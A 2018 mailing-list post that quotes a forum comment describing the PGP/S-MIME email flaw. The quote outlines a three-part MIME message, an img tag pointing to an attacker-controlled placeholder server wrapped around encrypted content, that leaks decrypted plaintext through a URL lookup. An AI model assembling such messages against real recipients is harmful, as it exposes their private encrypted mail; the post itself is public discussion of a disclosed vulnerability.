[ale] PGP hole: HTML decrypters bad, no security for you!
Joey Kelly
joey at joeykelly.net
Mon May 14 10:22:49 EDT 2018
>From some twit:
"The first of two (!) attacks does seem rather simple. Send email with
three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted
content] 3. "> Mail client decrypts 2, concatenates three parts and does
lookup on the URL which you control."
https://forums.theregister.co.uk/forum/1/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/
--
Joey Kelly
Minister of the Gospel and Linux Consultant
http://joeykelly.net
504-239-6550
More information about the Ale
mailing list